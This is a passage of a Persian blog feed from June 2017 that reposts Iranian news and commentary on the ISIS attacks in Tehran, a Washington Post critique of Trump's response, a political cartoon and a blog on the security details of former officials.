255, 255);"><font size="4">آنها برای اینکه ردی از خود به جای نگذارند، مجبور بودند که چند روزی در محل استقرار اولیه خود بمانند تا در یک فضای آرام، به مکان هدف برای استقرار نهایی برسند.</font></span></div><div style="text-align: justify;"><span style="background-color: rgb(204, 255, 255);"><font size="4"><br></font></span></div><div style="text-align: justify;"><span style="background-color: rgb(204, 255, 255);"><font size="4"><span style="font-weight: bold;">** همه‌چیز از ابتدا زیر نظر بود</span></font></span></div><div style="text-align: justify;"><span style="background-color: rgb(204, 255, 255);"><font size="4"><br></font></span></div><div style="text-align: justify;"><span style="background-color: rgb(204, 255, 255);"><font size="4">پس از استقرار اولیه ابوعایشه و نیروهایش در یکی از شهرهای مرزی در استان کرمانشاه، آنها پی می‌برند که احتمالاً محل استقرارشان لو رفته است و خانه تحت نظر نیروهای امنیتی است و اندکی بعد با مسجل شدن موضوع، همه چیز برای‌شان قطعی می‌شود که لو رفته‌اند.</font></span></div><div style="text-align: justify;"><span style="background-color: rgb(204, 255, 255);"><font size="4"><br></font></span></div><div style="text-align: justify;"><span style="background-color: rgb(204, 255, 255);"><font size="4">آنها تصمیم به فرار می‌گیرند ولی خانه‌شان محاصره شده بود و به‌ناچار با توجه به اینکه سلاح و مهمات قابل توجهی با خود همراه داشتند، تصمیم به ایجاد درگیری می‌گیرند تا شاید بتوانند با این کار، راه فراری برای خود از مهلکه درست کنند. حتی در جریان درگیری، یکی از اعضای تیم تروریستی با جلیقه انفجاری، خود را منفجر می‌کند.</font></span></div><div style="text-align: justify;"><span style="background-color: rgb(204, 255, 255);"><font size="4"><br></font></span></div><div style="text-align: justify;"><span style="background-color: rgb(204, 255, 255);"><font size="4">اما در جریان این درگیری تمام اعضای تیم تروریستی کشته شده و یکی از تک‌تیراندازان نیز موفق می‌شود که با شلیک گلوله فردی را که احتمالاً همان ابوعایشه یکی از معاونین عملیات گروهک تروریستی داعش بوده به هلاکت برساند.</font></span></div><div style="text-align: justify;"><span style="background-color: rgb(204, 255, 255);"><font size="4"><br></font></span></div><div style="text-align: justify;"><span style="background-color: rgb(204, 255, 255);"><font size="4"><span style="font-weight: bold;">** ماجرای ورود راحت ابوعایشه و همراهانش به ایران</span></font></span></div><div style="text-align: justify;"><span style="background-color: rgb(204, 255, 255);"><font size="4"><br></font></span></div><div style="text-align: justify;"><span style="background-color: rgb(204, 255, 255);"><font size="4">ماجرای ورود این تیم تروریستی به داخل کشور (به‌خلاف انهدام تیم دوم در نقطه صفر مرزی) از این قرار بود که پس از حرکت ابوعایشه و تیم همراهش از داخل خاک عراق به‌سوی ایران، با توجه به اشراف اطلاعاتی سنگین قرارگاه نجف اشرف نیروی زمینی سپاه پاسداران انقلاب اسلامی بر تحرکات این گروه، اعضای تیم‌ها شناسایی شده و از همان لحظات حرکت تحت رصد دقیق قرار می‌گیرند.</font></span></div><div style="text-align: justify;"><span style="background-color: rgb(204, 255, 255);"><font size="4"><br></font></span></div><div style="text-align: justify;"><span style="background-color: rgb(204, 255, 255);"><font size="4">این تروریست‌ها از ابتدا و حتی در مسیر حرکت نیز تحت رصد دقیق بوده و پس از رسیدن به مرز، برای اینکه نیروهای اطلاعاتی بتوانند از اهداف، امکانات، مرتبطین و. . . این تیم‌های تروریستی مطلع شده و حتی اعضای آن را زنده دستگیر کنند، موانع سر راه تروریست‌ها در مرز برداشته می‌شود تا راحت‌تر وارد خاک ایران شوند.</font></span></div><div style="text-align: justify;"><span style="background-color: rgb(204, 255, 255);"><font size="4"><br></font></span></div><div style="text-align: justify;"><span style="background-color: rgb(204, 255, 255);"><font size="4">پس از ورود نیز، تمام تحرکات این تیم تروریستی توسط سربازان گمنام امام زمان(عج) و نیروهای اطلاعاتی سپاه تحت رصد قرار می‌گیرد و تمام اعضای تیم شناسایی و اطلاعات‌شان تجمیع می‌شود.</font></span></div><div style="text-align: justify;"><span style="background-color: rgb(204, 255, 255);"><font size="4"><br></font></span></div><div style="text-align: justify;"><span style="background-color: rgb(204, 255, 255);"><font size="4">این عملیات بزرگ و حساب‌شده، با فرماندهی قرارگاه منطقه‌ای نجف نیروی زمینی سپاه کرمانشاه و با همکاری وزارت اطلاعات و نیروی انتظامی انجام شده است.<br><br></font></span><br> </div><font size="3"><br> </font><font style="font-size:8pt;"><font size="3"> <br> برچسب ها: <a href="/post/tag/ابوعایشه">ابوعایشه</a>، <a href="/post/tag/داعش">داعش</a>، <a href="/post/tag/حادثه تروریستی 17 خرداد تهران">حادثه تروریستی 17 خرداد تهران</a></font><font size="3">،</font><br><br><br></font> </div> text/html 2017-06-08T11:07:30+01:00 1001SHAYADOBAYAD.mihanblog.com عـبـــد عـا صـی واشنگتن پست: حملات تروریستی تهران دورویی ترامپ و متحدانش را به نمایش گذاشت http://1001SHAYADOBAYAD.mihanblog.com/post/3509 <div class="xpost2"><div style="float:right"></div> <div id="InPost_MihanblogShopAds" style="display:block;height:0px;width:100%;border:0px"></div><div class="col-md-6 col-sm-6 col-ms-12 no_padd"> <div class="news_nav news_pdate_c"> <span class="news_nav_title"><br><br><br>تاریخ انتشار: </span> ۱۱:۳۳ - ۱۸ خرداد ۱۳۹۶ <span style="direction: ltr">- 08 June 2017</span> </div> </div> <div class="row"> <div class="col-sm-6 no_padd"> <div class="news_path"> <a href="http://www.asriran.com/fa/archive?service_id=1" target="_blank">صفحه نخست</a> » <a href="http://www.asriran.com/fa/archive?service_id=1&amp;cat_id=2" target="_blank">سیاست خارجی</a> </div> </div> <div class="col-sm-6 no_padd"> <div title="نسخه چاپی" class="news_print_botton"></div> <div title="ارسال به دوستان" class="news_emails_botton"></div> <a title="ذخیره" class="news_save_botton" href="http://www.asriran.com/fa/save/543006"></a> <a href="http://www.asriran.com/fa/news/543006/واشنگتن-پست-حملات-تروریستی-تهران-دورویی-ترامپ-و-متحدانش-را-به-نمایش-گذاشت#" class="news_size_down"></a> <a href="http://www.asriran.com/fa/news/543006/واشنگتن-پست-حملات-تروریستی-تهران-دورویی-ترامپ-و-متحدانش-را-به-نمایش-گذاشت#" class="news_size_reset"></a> <a href="http://www.asriran.com/fa/news/543006/واشنگتن-پست-حملات-تروریستی-تهران-دورویی-ترامپ-و-متحدانش-را-به-نمایش-گذاشت#" class="news_size_up"></a> </div> </div> <div class="rutitr" style="text-align:center"></div> <div class="title" style="text-align:center;margin-bottom: 10px;margin-top: 4px;"> <h1 style="padding: 0px;margin: 0px" class="title"> <a href="http://www.asriran.com/fa/news/543006/واشنگتن-پست-حملات-تروریستی-تهران-دورویی-ترامپ-و-متحدانش-را-به-نمایش-گذاشت" target="_blank"> <font color="#000099">واشنگتن پست:</font> <font color="#CC0000">حملات تروریستی تهران دورویی ترامپ و متحدانش را به نمایش گذاشت</font> </a> </h1> </div> <div class="subtitle" style="margin-bottom: 10px;" align="justify"><font size="5" color="#000099"><span style="background-color: rgb(204, 255, 255);"><b><font face="Mihan-Koodak">این روزنامه آمریکایی پیام محکومیت با تاخیر و نیش و کنایه دار ترامپ را به شدت به باد انتقاد گرفته و به او گوشزد کرده که ایران از سوی گروهی که از منظر عقیدتی به عربستان سعودی نزدیک است، مورد هدف قرار گرفته است.</font></b></span></font></div><font size="5" color="#000099"><span style="background-color: rgb(204, 255, 255);"><b><font face="Mihan-Koodak"> </font></b></span></font><div align="justify"><font color="#000099"><span style="background-color: rgb(204, 255, 255);"><font size="4"><b><font face="Mihan-Koodak"><font size="5"> روزنامه آمریکایی واشنگتن پست با انتشار گزارشی نوشت حملات تروریستی روز چهارشنبه در ایران و نحوه واکنش جهانی به این حادثه ، دورویی دونالد ترامپ و متحدانش را در ادعای مبارزه با تروریسم به نمایش گذاشت.<br>به گزارش <a href="http://www.asriran.com">عصر ایران</a> این روزنامه آمریکایی با انتخاب این تیتر و با اشاره به واکنش های جهانی در محکومیت این حادثه تروریستی، نوشت: ترامپ و کاخ سفید با سکوتی طولانی پس از این حادثه نسبت به آن واکنش نشان داد و این در حالی بود که وزارت امور خارجه آمریکا پیش از واکنش ترامپ در بیانیه ای روتین و کوتاه، این حادثه تروریستی را محکوم کرد.<br>به نوشته واشنگتن پست واکنش ترامپ و توییت او در واکنش به حادثه تروریستی در ایران به هیچ وجه مناسب نبود و از بسیاری جهات از استانداردهای دستگاه دیپلماسی آمریکا در موارد مشابه سابق عدول کرده است.<br>واشنگتن پست به ترامپ یادآوری کرده که مقامات ایران با وجود موضع ضد آمریکایی و الصاق برچسب "شیطان بزرگ" به این کشور، در موارد انجام حملات تروریستی در آمریکا بدون اشاره به سابقه خصومت دو کشور، حوادث تروریستی را محکوم کرده اند که نمونه آنها محکومیت حادثه سال گذشته در شهر اورلاندو آمریکا و یا محکومت فوری حادثه تروریستی 11 سپتامبر بسیار جلوتر و پیش از بسیاری از متحدان آمریکا بوده است. حتی بسیاری از مردم تهران در همان شب حادثه تروریستی 11 سپتامبر با تجمع در میادین این شهر به یاد قربانیان شمع روشن کردند.<br></font><span style="background-color: rgb(255, 255, 204);"><font size="5">به نوشته این روزنامه آمریکایی: مقامات ایران در پیام های محکومیت حوادث تروریستی در آمریکا هیچ اشاره به این نکته نکرده اند که "شیطان بزرگ آنچه خود کِشته را درو می کند" در حالی که ترامپ در پیام توییتری خود با نیش و کنایه برخورد کرده است.</font></span><font size="5"><br></font><font size="5">بر اساس این گزارش این در حالی است که حادثه تروریستی دیروز ایران پس از سال ها مبارزه جدی این کشور با داعش در خط مقدم نبرد صورت گرفته و افزون بر آن، این گروه تروریستی (داعش) از نظر منشا ایدئولوژی و عقیدتی به نزدیک ترین متحد منطقه ای آمریکا یعنی عربستان سعودی نزدیک است.</font><font size="5"><br></font><font size="5">&nbsp;واشنگتن پست سیاست خارجی ترامپ در قبال منطقه و ایران را اشتباه دانسته و پیروی چشم بسته ترامپ از عربستان سعودی و اسراییل را به باد انتقاد گرفته است.<br><br></font></font></b></font></span></font></div><br><br><img src="http://cdn.asriran.com/files/fa/news/1396/3/18/707837_600.jpg" title="واشنگتن پست: حملات تروریستی تهران دورویی ترامپ و متحدانش را به نمایش گذاشت" alt="واشنگتن پست: حملات تروریستی تهران دورویی ترامپ و متحدانش را به نمایش گذاشت" style="border: medium none;" class="img-responsive" height="292" width="541"><br><br><br><br><br> <b></b> <font style="font-size:8pt;"> <br> <font size="3">برچسب ها: <a href="/post/tag/حملات تروریستی تهران">حملات تروریستی تهران</a>، <a href="/post/tag/دورویی ترامپ و متحدانش">دورویی ترامپ و متحدانش</a>، <a href="/post/tag/سیاست خارجی ترامپ">سیاست خارجی ترامپ</a>، <a href="/post/tag/عربستان">عربستان</a>، <a href="/post/tag/اسراییل">اسراییل</a>،</font><br><br><br></font> </div> text/html 2017-06-07T16:10:13+01:00 1001SHAYADOBAYAD.mihanblog.com عـبـــد عـا صـی گذشته را فراموش نمی کنیم؛ امروز را هم قدر می دانیم و نقد می کنیم/ اتحاد ملی در برابر تروریست ها http://1001SHAYADOBAYAD.mihanblog.com/post/3508 <div class="xpost2"><div style="float:right"></div> <div id="InPost_MihanblogShopAds" style="display:block;height:0px;width:100%;border:0px"></div> <div class="col-md-6 col-sm-6 col-ms-12 no_padd"> <div class="news_nav news_pdate_c"> <span class="news_nav_title"><br><br>تاریخ انتشار: </span> ۱۵:۰۹ - ۱۷ خرداد ۱۳۹۶ <span style="direction: ltr">- 07 June 2017</span> </div> </div> <div class="row"> <div class="col-sm-6 no_padd"> <div class="news_path"> <a href="http://www.asriran.com/fa/archive?service_id=1" target="_blank">صفحه نخست</a> » <a href="http://www.asriran.com/fa/archive?service_id=1&amp;cat_id=1" target="_blank">سیاسی</a> </div> </div> <div class="col-sm-6 no_padd"> </div> </div> <div style="direction: rtl;"> <div class="title" style="text-align:center;margin-bottom: 10px;margin-top: 4px;"> <h1 style="padding: 0px;margin: 0px" class="title">&nbsp;<font color="#009900"><span style="background-color: rgb(255, 255, 204);"> </span></font><a href="http://www.asriran.com/fa/news/542851/نکته-نگاری-عملیات-تروریستی-داعش-در-تهران-تسلیت-به-خانواده-های-شهدا-گذشته-را-فراموش-نمی-کنیم-امروز-را-هم-قدر-می-دانیم-و-نقد-می-کنیم-عربستان-و-حملات-تروریستی-تهران-واکنش-غیراخلاقی-برخی-دلواپسان-صدا-و-سیما-باز-هم-بازنده-ماجرا-رفتار-مردم-در-هنگام-حوادث-تروریستی-اتحاد-ملی-در-برابر-تروریست-ها" target="_blank"><font color="#009900"><span style="background-color: rgb(255, 255, 204);"> گذشته را فراموش نمی کنیم؛ امروز را هم قدر می دانیم و نقد می کنیم/ اتحاد ملی در برابر تروریست ها</span></font> </a> </h1> </div> <div class="subtitle" style="margin-bottom: 10px;"><font color="#000099"><span style="background-color: rgb(204, 255, 255);"><font size="5" face="Mihan-Koodak">افزایش هزینه های این بازی مرگبار برای عربستان، راهی موثر برای حفظ امنیت در داخل است.</font></span></font></div><font color="#000099"><span style="background-color: rgb(204, 255, 255);"><font size="5" face="Mihan-Koodak"> </font></span></font><div class="body" style="text-align: justify;padding: 10px;"> <font color="#000099"><span style="background-color: rgb(204, 255, 255);"><font size="5" face="Mihan-Koodak">عصر ایران - حملات تروریستی روز چهارشنبه تهران با شهادت و مجروح شدن تعدادی از هموطنان مان و نیز کشته شدن تروریست ها به پایان رسید. در این باره نکاتی را می توان مرور کرد:<br>تسلیت به خانواده های شهدا<br>قبل از هر چیز باید به خانواده هایی که در این حادثه تروریستی، عزیزان شان را از دست دادند، تسلیت گفت و برایشان طلب صبر کرد و نیز سلامتی کامل مجروحان را از درگاه الهی مسألت داشت.<br>گذشته را فراموش نمی کنیم؛ امروز را هم قدر می دانیم و نقد می کنیم<br>این که تروریست ها توانسته اند در قلب پایتخت و نیز در حرم امام(ره) دست به اقدام تروریستی بزنند، موضوعی است که دستگاه های امنیتی باید در قبال آن پاسخگو باشند ولی انصاف حکم می کند که با یک یا دو حادثه، تلاش های شبانه روزی نیروهای امنیتی در سال های گذشته تا به امروز را از یاد نبریم و بدانیم که اگر نبود مراقبت مجاهدانه آنها، امروز در ایران نیز مانند عراق، حوادث اینچنینی، عادی و روزمره شده بود.<br>با این حال، آنچه مسلم است این که حادثه اخیر و نقطه ضعف های نیروهای امنیتی و نظامی و انتظامی که از یک سو باعث بروز این رویداد خونین شد و از دیگر سو، ساعت ها به طول انجامید، باید به دقت و بی هیچ اغماضی مورد تجزیه و تحلیل قرار گیرد چه آن که از نیروهای دفاعی ایران انتظار بیشتری می رود. ضمن این که قدردان تلاش های کسانی هستیم که امروز ، رو در روی تروریست ها ایستادند و با به خطر انداختن جان خود، غائله را خواباندند.<br>عربستان و حملات تروریستی تهران<br>این اولین بار است که داعش در ایران اقدامی به این وسعت انجام می دهد. این اقدام تروریستی بعد از افزایش تنش بین ایران و عربستان و نیز تحولات صورت گرفته در خصوص قطر - یکی از متهمان حمایت از داعش - رخ داده است. هر چند که در حال حاضر نمی توان گفت که آیا آنچه در تهران رخ داده، به تحولات اخیر منطقه مربوط است یا نه اما بعید نیست که این حملات با هماهنگی ریاض صورت گرفته باشد، خاصه آن که یک ماه قبل، محمد بن سلمان، جانشین ولیعهد و وزیر دفاع عربستان گفته بود "سننقل المعركة إلى إیران" (نبرد را به داخل ایران خواهیم کشاند).<br><br><img src="http://cdn.asriran.com/files/fa/news/1396/3/17/707523_369.png" title="نکته نگاری عملیات تروریستی داعش در تهران: تسلیت به خانواده های شهدا/ گذشته را فراموش نمی کنیم؛ امروز را نقد می کنیم/ عربستان و حملات تروریستی تهران/ خوشحالی همزمان دلواپس ها و داعشی ها/ صدا و سیما ، باز هم بازنده ماجرا/ رفتار مردم در هنگام حوادث تروریستی/ اتحاد ملی در برابر تروریست ها" alt="نکته نگاری عملیات تروریستی داعش در تهران: تسلیت به خانواده های شهدا/ گذشته را فراموش نمی کنیم؛ امروز را نقد می کنیم/ عربستان و حملات تروریستی تهران/ خوشحالی همزمان دلواپس ها و داعشی ها/ صدا و سیما ، باز هم بازنده ماجرا/ رفتار مردم در هنگام حوادث تروریستی/ اتحاد ملی در برابر تروریست ها" style="border: medium none;" class="img-responsive" height="353" width="625"><br>به هر روی، دست داشتن عربستان در این اقدمات تروریستی جای بررسی جدی دارد و در صورت صحت موضوع، باید گفت که عربستان وارد فاز جدیدی در تقابل با ایران شده است و شیطنت های دیگر سعودی ها متصور است. افزایش هزینه های این بازی مرگبار برای عربستان، راهی موثر برای حفظ امنیت در داخل است.<br>واکنش غیراخلاقی برخی دلواپسان<br>آنچه همانند اصل حملات تروریستی اخیر تأسف بار است این که گروه هایی از دلواپسان(و نه اصولگرایان) به جای ناراحتی از شهادت و مجروح شدن دهها انسان بی گناه توسط تروریست ها، درشبکه های اجتماعی شان به شادمانی پرداخته و می کوشند از این حادثه تروریستی نمدی برای خود ببافند وآن را دلیلی برای نظریات ورشکسته شان بدانند: دیدید گفتیم برجام فایده ندارد؟ روحانی برود با تروریست هایی که در مجلس هستند مذاکره کند، برای رأی آوردن روحانی امنیت را ذبح کردند و... .<br>باعث شرمساری است که گروهی در داخل ایران، به جای تقویت همبستگی ملی در چنین وضعیتی، آنقدر فاقد قدرت تحلیل هستند که بر آتش تفرقه می دمند و همزمان با داعشی ها، به خوشحالی می پردازند! <br><font color="#CC0000">صدا و سیما ، باز هم بازنده ماجرا</font><br>همزمان با اقدامات تروریستی در حرم امام و مجلس شورای اسلامی، شبکه خبر سیما -که فلسفه وجودی اش، نشر سریع اخبار است- در حال پخش برنامه ای در باره شهریه مهد کودک ها&nbsp; بهزیستی بود و سپس گفت و گویی درباره طرح کارورزی داشت و هر از گاهی نیز خبری از حرم و بهارستان پخش می کرد تا ثابت کند که همچنان رسانه ای بسیار تنبل است.<br><br></font></span></font><div align="center"><font color="#000099"><span style="background-color: rgb(204, 255, 255);"><font size="5" face="Mihan-Koodak"><img src="http://cdn.asriran.com/files/fa/news/1396/3/17/707526_579.jpg" title="نکته نگاری عملیات تروریستی داعش در تهران: تسلیت به خانواده های شهدا/ گذشته را فراموش نمی کنیم؛ امروز را نقد می کنیم/ عربستان و حملات تروریستی تهران/ خوشحالی همزمان دلواپس ها و داعشی ها/ صدا و سیما ، باز هم بازنده ماجرا/ رفتار مردم در هنگام حوادث تروریستی/ اتحاد ملی در برابر تروریست ها" alt="نکته نگاری عملیات تروریستی داعش در تهران: تسلیت به خانواده های شهدا/ گذشته را فراموش نمی کنیم؛ امروز را نقد می کنیم/ عربستان و حملات تروریستی تهران/ خوشحالی همزمان دلواپس ها و داعشی ها/ صدا و سیما ، باز هم بازنده ماجرا/ رفتار مردم در هنگام حوادث تروریستی/ اتحاد ملی در برابر تروریست ها" style="border: medium none;" class="img-responsive" height="291" width="518"><br></font></span></font></div><font color="#000099"><span style="background-color: rgb(204, 255, 255);"><font size="5" face="Mihan-Koodak">جالب اینجاست که همزمان با کندی شبکه خبر، رسانه های انگلیسی و عربی، در حال پخش تصاویر و تحلیل های خود درباره وقایع تهران بودند.<br>رفتار مردم در هنگام حوادث تروریستی<br>امید که این حادثه، آخرین اقدام تروریستی باشد ولی واقعیت این است که وقوع حوادث تروریستی در دنیای امروز، استرالیا و افغانستان و ایران و عراق و سوریه و انگلیس و فرانسه و آمریکا نمی شناسد و هر آن ممکن است در هر جا، تروریستی دست به جنایت بزند.<br>بنابراین، آموزش مردم برای کاستن از تبعات حوادث تروریستی، بسیار مهم و ضروری است. حادثه امروز نشان داد که رفتار مردم ما در برابر حادث تروریستی نیازمند اصلاح است. این واقعاً عجیب بود که مردم در اطراف ساختمان مجلس تجمع کرده و انگار که در حال تماشای یک نمایش هستند خود را در معرض خطر قرار داده بودند. این در حالی بود که هر لحظه امکان داشت، تروریست ها به سمت آنها تیراندازی کنند یا یک عامل انتحاری، جمعیت متراکم را هدفی برای جنایت خود قرار دهد.<br><br></font></span></font><div align="center"><font color="#000099"><span style="background-color: rgb(204, 255, 255);"><font size="5" face="Mihan-Koodak"><sub>سمت راست: تجمع مردم در منطقه خطر هنگام حملات تروریستی در تهران<br>سمت چپ: فاصله گرفتن مردم از محل حادثه تروریستی در انگلیس</sub><br></font></span></font></div><font color="#000099"><span style="background-color: rgb(204, 255, 255);"><font size="5" face="Mihan-Koodak"><br></font></span></font><div align="center"><font color="#000099"><span style="background-color: rgb(204, 255, 255);"><font size="5" face="Mihan-Koodak"><img src="http://cdn.asriran.com/files/fa/news/1396/3/17/707528_410.jpg" title="نکته نگاری عملیات تروریستی داعش در تهران: تسلیت به خانواده های شهدا/ گذشته را فراموش نمی کنیم؛ امروز را نقد می کنیم/ عربستان و حملات تروریستی تهران/ خوشحالی همزمان دلواپس ها و داعشی ها/ صدا و سیما ، باز هم بازنده ماجرا/ رفتار مردم در هنگام حوادث تروریستی/ اتحاد ملی در برابر تروریست ها" alt="نکته نگاری عملیات تروریستی داعش در تهران: تسلیت به خانواده های شهدا/ گذشته را فراموش نمی کنیم؛ امروز را نقد می کنیم/ عربستان و حملات تروریستی تهران/ خوشحالی همزمان دلواپس ها و داعشی ها/ صدا و سیما ، باز هم بازنده ماجرا/ رفتار مردم در هنگام حوادث تروریستی/ اتحاد ملی در برابر تروریست ها" style="border: medium none;" class="img-responsive" height="275" width="748"><br></font></span></font></div><font color="#000099"><span style="background-color: rgb(204, 255, 255);"><font size="5" face="Mihan-Koodak">&nbsp;همچنین رفتارهایی که در شبکه های مجازی شاهدش بودیم نیز آمیخته با خطا بود، مانند توجه به شایعات و بازنشر خبرهای فاقد منبع موثق در شبکه های اجتماعی.<br>اتحاد ملی در برابر تروریست ها<br>تروریست ها ، فقط کشتن چند شهروند یا آسیب به در و دیوار مجلس را هدفگذاری نکرده اند؛ هدف آنها ایجاد شکاف در جامعه و گسترش رعب و وحشت عمومی است. بدون توجه به رفتارهای نابخردانه چند دلواپس انگشت شمار، فارغ از هر جبهه بندی سیاسی و فکری، در برابر تروریست ها، ملتی متحد هستیم و بی هیچ ترسی از آنها، به مبارزه تاریخی مان با تروریسم ادامه می دهیم. </font></span></font><font color="#000099"><span style="background-color: rgb(204, 255, 255);"><font size="5" face="Mihan-Koodak">همه در کنار هم هستیم ، یکدل، متحد، قوی ... مبارزه با تروریسم ادامه دارد.</font></span></font></div></div> <b></b> <font style="font-size:8pt;"> </font> </div> text/html 2017-06-07T08:01:47+01:00 1001SHAYADOBAYAD.mihanblog.com عـبـــد عـا صـی جدیدترین شیوه کنترل چماق بدستان گروه فشار! http://1001SHAYADOBAYAD.mihanblog.com/post/3507 <div class="xpost2"><div style="float:right"></div> <div id="InPost_MihanblogShopAds" style="display:block;height:0px;width:100%;border:0px"></div><br><br><h2>&nbsp;&nbsp; <font size="6" face="arial,helvetica,sans-serif" color="#000099"><span style="background-color: rgb(255, 255, 204);">جدیدترین شیوه کنترل چماق بدستان گروه فشار! </span></font></h2> <div class="leadCont"> <p> <span>طنز و کاریکاتور&nbsp;&gt;&nbsp;کاریکاتور - </span>«بهره وری از قدرت خشونت!» عنوان کارتون منتشر شده از مجتبی حیدرپناه در کانال نیشخط است. </p> </div> <div class=" clear"> </div> <p>&nbsp;</p> <p><img src="http://images.khabaronline.ir//images/2017/6/17-6-6-2851photo_2017-06-06_00-13-57.jpg" width="100%"></p> <br><br><br> <b></b> <font style="font-size:8pt;"> </font> </div> text/html 2017-06-05T21:12:29+01:00 1001SHAYADOBAYAD.mihanblog.com عـبـــد عـا صـی فرش زیر پای مصلحت! http://1001SHAYADOBAYAD.mihanblog.com/post/3506 <div class="xpost2"><div style="float:right"></div> <div id="InPost_MihanblogShopAds" style="display:block;height:0px;width:100%;border:0px"></div><br><br><br><font color="#CC0000"><span style="background-color: rgb(204, 204, 255);"><b><font size="6" face="arial,helvetica,sans-serif"><a href="http://www.khabaronline.ir/detail/672384/root/weblog">&nbsp; فرش زیر پای مصلحت! &nbsp;&nbsp; </a></font></b></span></font><br><br><br><br> <strong> <p style="line-height: 70px; margin-top: 0; margin-bottom: 0"> <b> <b style="color: rgb(68, 68, 68); font-family: Tahoma; font-size: 12px; font-style: normal; font-variant: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(183, 152, 105)"> <b style="color: rgb(42, 32, 17); font-size: 12px; line-height: normal; background-color: rgb(183, 152, 105)"> <span style="background-color: rgb(255, 255, 0)"> <font size="5" face="Arial" color="#0000ff">&nbsp;&nbsp;<span lang="fa">جهت مراجعه به&nbsp;</span></font></span></b><span lang="fa"><b style="color: rgb(42, 32, 17); font-size: 12px; line-height: normal; background-color: #E3FFFF"><font size="5" face="Arial" color="#0033cc">مرجع متن</font></b><b style="color: rgb(42, 32, 17); font-size: 12px; line-height: normal; background-color: rgb(183, 152, 105)"><span style="background-color: rgb(255, 255, 0)"><font size="5" face="Arial" color="#0000ff">، یا&nbsp;</font></span></b><b style="color: rgb(42, 32, 17); font-size: 12px; line-height: normal; background-color: #E3FFFF"><font size="5" face="Arial" color="#0033cc">عنوان اصلی</font></b><span style="background-color: rgb(255, 255, 0)"><font size="5" face="Arial" color="#0000ff"><b style="line-height: normal; ">، به پیوند فوق اشاره</b></font></span></span><span style="background-color: rgb(255, 255, 0)"><font size="5" face="Arial" color="#0000ff"><b style="line-height: normal; "> کنید <span lang="fa">&nbsp;</span></b></font></span></b></b></p><b><b style="color: rgb(68, 68, 68); font-family: Tahoma; font-size: 12px; font-style: normal; font-variant: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(183, 152, 105)"><font size="5" face="Microsoft Sans Serif" color="#0033CC"> </font> </b> </b></strong><b> </b> <br><br><br><br> <div class="newsPhoto"> <img src="http://images.khabaronline.ir/images/2017/6/position50/16-10-14-193841photo_2016-10-14_19-33-28.jpg" class="thumbnail" height="453" width="555"> </div> <div class="leadCont"> <p> <span><br></span></p><p align="justify"><font color="#000099"><span style="background-color: rgb(204, 255, 255);"><font size="4" face="Mihan-Koodak"><span><span style="background-color: rgb(255, 255, 102);">وبلاگ اکبری، علیرضا ، خبرآنلاین :&nbsp;</span> </span>اخیراً دوستان سابق پاستور، داستان یک باب ساختمان در میدان نارمک را، پیراهن خلیفه کرده، و اقدام به جمع اوری "أعانه ملّی" کرده اند. </font></span></font></p><font color="#000099"><span style="background-color: rgb(204, 255, 255);"><font size="4" face="Mihan-Koodak"> </font></span></font></div><font color="#000099"><span style="background-color: rgb(204, 255, 255);"><font size="4" face="Mihan-Koodak"> </font></span></font><div class=" clear" align="justify"> </div><font color="#000099"><span style="background-color: rgb(204, 255, 255);"><font size="4" face="Mihan-Koodak"> </font></span></font><div class="body" align="justify"> <p><font color="#000099"><span style="background-color: rgb(204, 255, 255);"><font size="4" face="Mihan-Koodak">میگویند، اگر برای ر.ج سابق مشكل حفاظتی پیش امد، مسئول ان، ر.ج فعلی است. <br>میگویند، "مردم، كمك كنید و أعانه دهید تا ما ان ساختمان را بخریم، و ان شخص را از گزند حوادث، محفوظ بداریم!"<br>عزیزانی از این بنده سوْال كردند كه، این داستان را چگونه می بینم؟ <br>پاسخ زیر، بر خلاف میل باطنی نگاشته شده، و چون دیدم بعض مردم پاكدل و پاكدست، از این داستان متاثر شده اند، گفتم شاید بتوان دل پاك ایشان را از دست بلند بعضی، مصون داشت. لذا، نوشتم؛...<br>مستحضرید كه، "امر حفاظت" و ملزومات ان، در تمامی رده های مقامات حكومتی (قوای سه گانه و دیگران) و أماكن حساس، ربط و نسبتی با دولت ندارد، بلكه، این امر از صدر تا ذیل بر عهده عزیزان و برادران سپاه ، نیروی مقاومت بسیج و سپاه های تابعه ( حفاظت شخصیت ها، حفاظت أماكن، حفاظت هواپیمایی، حفاظت روسای قوا، حفاظت مناطق حساس و....) میباشد . <br>برای تك تك سَرفصل ها و تك تك رده ها و اشخاص، دستور العمل و حتی قانون معین وجود دارد. وفق مسئولیتها نیز، إمكانات و تجهیزات و نفرات كاملاً معین شده ، تعریف شده است،<br>تعداد نفرات و نوع تجهیزات و إمكانات حفاظتی نیز، تابع مقررات و دستورالعمل های خاص، است. <br>سلسله مراتب ، در همه سطوح ، كاملا تعیین شده است. <br>مثلا جایی كه عالیترین مقام اجرایی حضور دارد و ضمناً هر تعداد شخصیت رده حفاظتی دیگر كه حاضر باشند، مسئولیت و كنترل، بر عهده تیم حفاظت مقام بالاتر است (مثلا ر.ج)، و همه نیروها و رده ها تحت امر فرمانده حفاظت ان مقام عالی خواهند بود. <br>حفاظت از "مقامات سابق"، نیز خود تابع مقررات خاص است، أعم از اینكه انها، دارای پٌست فعلی باشند یا خیر، . مثلا یك وزیر، تا مدت معینی پس از وزارت، تا یك رده معین، تیم حفاظتی دارد، یا یك رییس جمهور سایق، فارغ از وضع كنونی او، تا زمان معینی، رده معینی از حفاظت دارد،<br>تمام اینها، در قانون و مقررات، تعریف شده و مسئولیت ان با فرماندهان قرارگاههای حفاظتی مربوط، و النهایه، نیروی مقاومت و سپاه های حفاظت تابعه فرماندهی سپاه اند (مثل سپاه حفاظت ....، و یا سپاه حفاظت .... ، و ...) <br>امّاٰ، در خصوص خبر مذكور و ساختمان محل بحث، - این قضیه، ماهیت حفاظتی ندارد، بلكه&nbsp; ماهیت اداری دارد. یعنی چه؟ <br>به این معنا كه، مسئولیت تامین تمام تجهیزات و إمكانات لازم برای تامین حفاظت شخصیت، بر عهده یگان حفاظت&nbsp; مربوطه است، از جمله أماكن استراحت نیروها. <br>مثلا، اقای ..... در زمان مسئولیت سابق خود، یك نیروی معین و مبسوط، مسئول حفاظت ایشان بوده است، امّاٰ، بعد از مسئولیت، یك تعداد نیروی محدود (مثلا چند تیم چند نفره) از ایشان حفاظت میكنند. <br>در زمان 